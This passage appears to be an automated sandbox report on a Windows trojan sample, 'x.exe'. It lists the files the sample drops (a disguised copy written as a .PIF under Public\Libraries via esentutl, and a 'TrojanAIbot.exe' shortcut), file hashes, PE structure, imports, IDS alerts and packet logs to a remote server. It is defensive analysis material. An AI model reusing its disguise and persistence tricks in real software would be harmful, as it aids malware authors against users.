                                                                                                              SSDEEP:24:8iHTcDylXUan3bByANsVs4FSnrlwO4ZTqlOBm:8iHTcDyl1nLBRr4+rlwZTqlS
                                                                                                              MD5:F93463814898869600E73F7B6F6F5E5F
                                                                                                              SHA1:D0AEABCEB57F8555EF1B200176B2A6DDBE4C6680
                                                                                                              SHA-256:6A21B311794AED786ED0E8FFA807E2085F2447A0F982049BF153D6C4DF9E92DA
                                                                                                              SHA-512:C53ADF33B6457A8F4781C7DA384287682F492D01564A4F2D5E4C3A63EBE72774CDBEEB8D82340072D35E60CE457E8E12C9DD6D707EE55158347812D64550BEFB
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...>....5..f...5..M4...5............................:..DG..Yr?.D..U..k0.&...&.......$..S.....@..5...~...5......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2lY.v...........................^.A.p.p.D.a.t.a...B.V.1.....lY.v..Roaming.@......EW<2lY.v..../.....................?...R.o.a.m.i.n.g.....T.1.....lY.v..ACCApi..>......lY.vlY.v....a.......................5.A.C.C.A.p.i.....l.2.....lY.v .TROJAN~1.EXE..P......lY.vlY.v............................y.T.r.o.j.a.n.A.I.b.o.t...e.x.e.......g...............-.......f...........Pu.e.....C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.3.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe......................................................................................................

                                                                                                              \Device\ConDrv

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):584
                                                                                                              Entropy (8bit):4.577748679815264
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:q82lxTzP1eSbZ7u0wxDDDDDDDDjCaY5xcVaYAaMaTB8NGNgL:bexTzdp7u0wQakxKaLat8NN
                                                                                                              MD5:CF86EBE29BA30115D6897C13D97CB13E
                                                                                                              SHA1:9C6EC113EA72063CA4AD63821B93072CFF3C8ED7
                                                                                                              SHA-256:33056DA535B20A3D9472950C3AAE1A5BE817D771CD7B7E97DBD5317C3F4D2D97
                                                                                                              SHA-512:A18D565B6A4578E965747D2C806B118E5F0C345F5152F2571555284C02EF68BD30074975C9582A1CB90701A2D019B5027F457CB7CC784701931936EA88900BC2
                                                                                                              Malicious:false
                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x108200 (1081856) (1 MB)....Total bytes written = 0x109000 (1085440) (1 MB).......Operation completed successfully in 0.141 seconds.....

                                                                                                              \Device\Null

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\timeout.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66
                                                                                                              Entropy (8bit):4.524640141725149
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                                              MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                                              SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                                              SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                                              SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                                              Malicious:false
                                                                                                              Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):6.9272903664814445
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                              • Windows Screen Saver (13104/52) 0.13%
                                                                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              File name:x.exe
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5:31bc6907d6097a76bb1dd891cfc09b7a
                                                                                                              SHA1:97340ca203a1207e492135d580c6860a724a227f
                                                                                                              SHA256:f711703c8ba66dcedb8e4b83f21a0425c528e278242c852fd5cf54bb43e30454
                                                                                                              SHA512:6c217fa37cc4c655cda0a2a491e49ac736e4940027178b3c7d6488d296923d40cc26a4d0142052b94b58491fa90f17ab3f4115cb0c75efe09175e732d62dbbf5
                                                                                                              SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                              TLSH:2835AF7AF6744861E037A5398CCB67A6582DBF7C1928B4C226F65B7C2E3A350340BD53
                                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                              File Icon

                                                                                                              Icon Hash:08302020c0c92020

                                                                                                              Static PE Info

                                                                                                              General

                                                                                                              Entrypoint:0x46475c
                                                                                                              Entrypoint Section:.itext
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                              DLL Characteristics:
                                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:ea87ad3ff9b755fe3923cfc8eb894da6

                                                                                                              Entrypoint Preview

                                                                                                              Instruction
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              add esp, FFFFFFF0h
                                                                                                              mov eax, 00463490h
                                                                                                              call 00007F5829356ED9h
                                                                                                              mov eax, dword ptr [00466C04h]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              call 00007F58293AA1A9h
                                                                                                              mov ecx, dword ptr [00466CF8h]
                                                                                                              mov eax, dword ptr [00466C04h]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [00462264h]
                                                                                                              call 00007F58293AA1A9h
                                                                                                              mov ecx, dword ptr [00466D30h]
                                                                                                              mov eax, dword ptr [00466C04h]
                                                                                                              mov eax, dword ptr [eax]
                                                                                                              mov edx, dword ptr [00462064h]
                                                                                                              call 00007F58293AA191h
                                                                                                              call 00007F5829354DA4h
                                                                                                              lea eax, dword ptr [eax+00h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6b0000x2536.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x99400.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x7230.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x6f0000x18.rdata
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x6b6e40x5cc.idata
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                              Sections

                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x10000x626e00x62800d57bd0e6646e792cf3a8b0429a5b2336False0.5127300126903553data6.509466837289833IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .itext0x640000x7b00x80020a59b0afa52ae48c0f33c7bcb0e6f95False0.60693359375data6.022301347009192IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .data0x650000x1d980x1e00c44ec72c2f706b9a0c3271d1f8179421False0.4016927083333333data3.872761412786969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .bss0x670000x36ac0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .idata0x6b0000x25360x2600f2768d24a229e45d9b72c514c6905c1fFalse0.3190789473684211data5.1451129727895095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .tls0x6e0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                              .rdata0x6f0000x180x200e69c9ffd209bb239dd4bf62d0475d59bFalse0.05078125data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x700000x72300x74008c16d72a0182b5ddd3a8d48f93bccff6False0.615167025862069data6.65870845851274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x780000x994000x994003ac8474f7e2f3188227a6a1a6e7e8ae3False0.40286628262642743data6.568668310967687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_CURSOR0x78b300x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                              RT_CURSOR0x78c640x134dataEnglishUnited States0.4642857142857143
                                                                                                              RT_CURSOR0x78d980x134dataEnglishUnited States0.4805194805194805
                                                                                                              RT_CURSOR0x78ecc0x134dataEnglishUnited States0.38311688311688313
                                                                                                              RT_CURSOR0x790000x134dataEnglishUnited States0.36038961038961037
                                                                                                              RT_CURSOR0x791340x134dataEnglishUnited States0.4090909090909091
                                                                                                              RT_CURSOR0x792680x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                              RT_BITMAP0x7939c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                              RT_BITMAP0x7956c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                              RT_BITMAP0x797500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                              RT_BITMAP0x799200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                              RT_BITMAP0x79af00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                              RT_BITMAP0x79cc00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                              RT_BITMAP0x79e900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                              RT_BITMAP0x7a0600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                              RT_BITMAP0x7a2300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                              RT_BITMAP0x7a4000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                              RT_BITMAP0x7a5d00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                              RT_ICON0x7a6b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m0.0979253112033195
                                                                                                              RT_ICON0x7cc600x15b7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.908256880733945
                                                                                                              RT_DIALOG0x7e2180x52data0.7682926829268293
                                                                                                              RT_DIALOG0x7e26c0x52data0.7560975609756098
                                                                                                              RT_STRING0x7e2c00x174Targa image data - Color 99 x 107 x 32 +68 +111 "z"0.5161290322580645
                                                                                                              RT_STRING0x7e4340x208data0.5365384615384615
                                                                                                              RT_STRING0x7e63c0xccdata0.6715686274509803
                                                                                                              RT_STRING0x7e7080xe4data0.6403508771929824
                                                                                                              RT_STRING0x7e7ec0x3f4data0.4041501976284585
                                                                                                              RT_STRING0x7ebe00x3a8data0.36538461538461536
                                                                                                              RT_STRING0x7ef880x394data0.3941048034934498
                                                                                                              RT_STRING0x7f31c0x3f8data0.37598425196850394
                                                                                                              RT_STRING0x7f7140xf4data0.5532786885245902
                                                                                                              RT_STRING0x7f8080xc4data0.6275510204081632
                                                                                                              RT_STRING0x7f8cc0x22cdata0.5017985611510791
                                                                                                              RT_STRING0x7faf80x3b4data0.3227848101265823
                                                                                                              RT_STRING0x7feac0x368data0.37844036697247707
                                                                                                              RT_STRING0x802140x2b8data0.3879310344827586
                                                                                                              RT_RCDATA0x804cc0x10data1.5
                                                                                                              RT_RCDATA0x804dc0x310data0.6977040816326531
                                                                                                              RT_RCDATA0x807ec0xa20Delphi compiled form 'TForm1'0.41435185185185186
                                                                                                              RT_RCDATA0x8120c0x755Delphi compiled form 'TForm2'0.42301545018646775
                                                                                                              RT_RCDATA0x819640x8f838PNG image data, 225 x 225, 8-bit colormap, non-interlacedEnglishUnited States0.4054559806203133
                                                                                                              RT_GROUP_CURSOR0x11119c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x1111b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                              RT_GROUP_CURSOR0x1111c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x1111d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x1111ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x1112000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_CURSOR0x1112140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                              RT_GROUP_ICON0x1112280x22data1.0588235294117647

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                              user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                              kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                              user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                              kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                              kernel32.dllSleep
                                                                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                              comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Suricata IDS Alerts

                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-11-12T15:55:02.088938+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710198.252.105.91443TCP
                                                                                                              2024-11-12T15:55:20.344502+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649721TCP
                                                                                                              2024-11-12T15:55:58.715306+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.649888TCP

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 12, 2024 15:55:01.434278011 CET49709443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.434331894 CET44349709198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:01.434422016 CET49709443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.434942961 CET49709443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.434993029 CET44349709198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:01.435061932 CET49709443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.472915888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.472968102 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:01.473043919 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.477974892 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:01.477991104 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.088825941 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.088937998 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.093328953 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.093347073 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.093650103 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.146259069 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.298863888 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.343328953 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.421322107 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.465269089 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537437916 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537461996 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537483931 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537491083 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537512064 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537702084 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537702084 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.537729025 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.537777901 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539791107 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539799929 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539833069 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539866924 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539876938 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.539901972 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.539923906 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.652843952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.652869940 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.653150082 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.653182030 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.653251886 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:02.654488087 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654504061 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:02.654561996 CET49710443192.168.2.6198.252.105.91
